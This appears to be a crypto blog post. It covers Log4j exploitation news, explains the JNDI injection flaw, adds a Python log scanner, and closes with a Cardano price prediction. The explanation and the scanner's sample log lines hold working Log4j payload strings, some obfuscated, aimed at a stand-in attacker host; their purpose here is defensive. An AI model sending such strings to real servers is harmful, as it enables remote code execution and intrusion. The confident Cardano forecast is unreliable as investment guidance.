
Today, we’ll look at the latest security vulnerability that is sweeping the web, the hacks that it is bringing, and how this is affecting the crypto world. Towards the end, we’ll also dive into some price predictions for Cardano Ada and what that could mean for your investments.

The Log4j Vulnerability

To start off, we’ll talk about the vulnerability that is sweeping the web right now – Log4j. There have actually been 2 waves of Log4j attacks. The first wave was brutal, but the next one is going to be far more brutal: one, because a lot of people think they have already patched; two, because the hackers are getting more and more creative.

Here’s a recent report by WIRED regarding the Log4j vulnerability:

“A week ago, the internet experienced a seismic event. Thanks to a vulnerability in Log4j, a popular open source library, multitudes of servers around the world were suddenly exposed to relatively simple attacks. The first wave of hacking is well underway. But it’s what comes next that should worry you.

So far, the vanguard of Log4j hacking has primarily comprised cryptominers, malware that leeches resources off of an affected system to mine cryptocurrency. (These were extremely popular a few years ago, before everyone realized that the real money’s in ransomware.) Some nation-state spies have dabbled as well, according to recent reports from Microsoft and others. What’s seemingly missing is the extortion, the ransomware, the disruptive attacks that have defined so much of the past two years or so. This won’t be the case for long.”

“It is by far the single biggest, most critical vulnerability ever.” says Amit Yoran, TENABLE.

– What we’ve seen so far…

Taking the above report into account, here’s one example that we found from https://www.tomshardware.com/:

“An Amazon Web Services (AWS) customer had a really bad day when they received an unsolicited $45,000 bill for renting computing power from Amazon’s cloud based servers. Further investigation showed that the customer’s account was hacked, allowing the bad actors to spin up AWS servers around the globe while running a cryptocurrency mining software for privacy-focused coin Monero.”

“On-demand, distributed computing services such as Microsoft’s Azure or Amazon’s Web Services are common, used by organizations and individuals for multiple purposes.”

“The AWS customer finally received a response from the company regarding his exorbitant $45,000 bill; after 27 hours of waiting, they informed him that his case would require a further 24 hours of “monitoring” before it was sent to the billing department for a proper review – which can then take days.”

The funny thing is that, in the end, the hacker only gained $800 worth of Monero. Not only did the customer get a heart attack from a $45,000 AWS bill, the whole thing ultimately produced only $800 of Monero. These servers aren’t really good at mining anyway, because you really need the power of a graphics card or other ASIC-type processing.

Microsoft and the Log4j Exploits

In other news, Microsoft is warning that the Log4j exploits extend past crypto mining to outright theft. People are now using Log4j to record the keystrokes coming across the server, and are then stealing full credentials on some of the most important servers across the world. So people are ultimately using Log4j on Azure to steal credentials and then spin up and steal resources through them.


Microsoft has observed activities including installing coin miners, using Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems. Additionally, attackers are using this to spread botnets across the web. This is going to end up causing a lot of further problems down the road that we haven’t even detected yet.

What We’re Dealing With Here…

Moving on, let’s look at what this exploit is and why it is causing so much noise. According to Check Point, “The vulnerability, designated as CVE-2021-44228 and also referred to as “Log4j”, allows remote attackers to gain control over vulnerable targets. To perform remote code execution, an attacker only needs to send a simple malicious request that contains a formatted string that is then picked up by the log4j library.”

“The vulnerability occurs due to a lack of sanitization in the lookup method used in the log4j library. An attacker can leverage JNDI (Java Naming and Directory Interface) to perform a request to a remote malicious resource as follows: ${jndi:ldap://[attacker_domain]/file}”

“Using different protocols such as ldap, rmi and commands like upper/ lower, an attacker can create multiple attack string combinations. In addition, we observed many obfuscation techniques to avoid detection.”
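
To make the Check Point description concrete from the defender's side, here is an added example (not from the original post or from Check Point) that scans log lines for the JNDI lookup string and first resolves the upper/lower lookups mentioned in the quote, so obfuscated variants are caught too. The function names, the sample log lines and the `attacker.example` host are constructed for illustration.

```python
import re

# Innermost ${upper:x} / ${lower:x} lookups, the "upper/lower" trick named in
# the Check Point quote. Assumption: only these two lookup types are resolved.
_CASE_LOOKUP = re.compile(r"\$\{(upper|lower):([^${}]*)\}", re.IGNORECASE)
# JNDI lookup using a protocol named on the page (ldap, rmi), plus ldaps.
_JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi)://([^/}\s]+)", re.IGNORECASE)

def _apply_case(match):
    """Replace one upper/lower lookup with the text it evaluates to."""
    value = match.group(2)
    return value.upper() if match.group(1).lower() == "upper" else value.lower()

def normalize(text, max_passes=10):
    """Resolve nested upper/lower lookups until the string stops changing."""
    for _ in range(max_passes):
        resolved = _CASE_LOOKUP.sub(_apply_case, text)
        if resolved == text:
            break
        text = resolved
    return text

def find_jndi_lookups(line):
    """Return (protocol, host) for each JNDI lookup in one log line."""
    return [(m.group(1).lower(), m.group(2).lower())
            for m in _JNDI.finditer(normalize(line))]

def scan(lines):
    """Map 1-based line number to findings, for lines with any finding."""
    findings = {}
    for number, line in enumerate(lines, 1):
        hits = find_jndi_lookups(line)
        if hits:
            findings[number] = hits
    return findings

# Constructed sample access-log lines (not real traffic); all hosts and
# addresses are reserved documentation values.
SAMPLE_LOG = [
    '203.0.113.7 "GET /index.html" 200 "Mozilla/5.0"',
    '203.0.113.9 "GET /" 200 "${jndi:ldap://attacker.example/file}"',
    '203.0.113.9 "GET /?q=${${lower:j}ndi:${lower:r}mi://attacker.example/a}" 404 "-"',
    '203.0.113.9 "GET /" 200 "${${upper:j}${lower:N}di:ldap://attacker.example/x}"',
    '198.51.100.4 "GET /docs?topic=jndi" 200 "curl/8.0"',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG).items():
        print(number, hits)
```

A hit only means the string reached the log, not that the server processed it; whether the host runs a vulnerable Log4j version still has to be checked separately.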

Breaking down the major attack

Log4j vulnerability
Image by Check Point

In the example above, we can see that the beginning part of the string is what lets the attacker get the part in red processed. They can then string multiple commands together by encoding them in Base64. This would basically allow someone to write an entire computer program, encode it into Base64, and send it over along with the command that decodes the Base64. After that, they can run absolutely anything they want.

In the same example, you’ll see that they’re downloading a string that then runs a set of programs hosted on some remote server.

So ultimately, the malicious request comes in, the server executes it, and it then goes to the LDAP server, where all the usernames and passwords stay. From there, it is made to execute a payload, which pulls down a file from another server and runs it. This would then allow them to do absolutely anything.

So, this is a huge deal, and something we all need to make sure we are patched against. Check with a security professional if you don’t have any idea what you’re looking at.

Cardano Ada Price Prediction

Moving towards the end, we’ll finally talk a little bit about Cardano and its price prediction. Obviously, we’ve seen Cardano get beat up pretty bad over the last couple of weeks. However, Cardano Ada has been forming a consolidating pattern, with a triangle that’s near its conclusion, just above a daily demand zone, rising from $1.02 to $1.19. As we can see the consolidating pattern take shape, the chance of Cardano Ada heading lower is low.

Cardano Ada chart

And as this potential rise takes off and it passes the $1.45 mark, we’re seeing Cardano Ada go up to potentially $1.51.

Thank you for sticking with me to the very end. We hope this has been valuable information to your journey with cryptocurrencies. You can keep track of our blog or YouTube channel to stay updated about crypto every day. And as always, make sure to keep your kids protected with CleanRouter and CleanPhone. This lets you have the ultimate parental controls with how your kids use their phone 🙂

Spencer Thomason is the CEO and Co-founder of CleanRouter, as well as many other products.
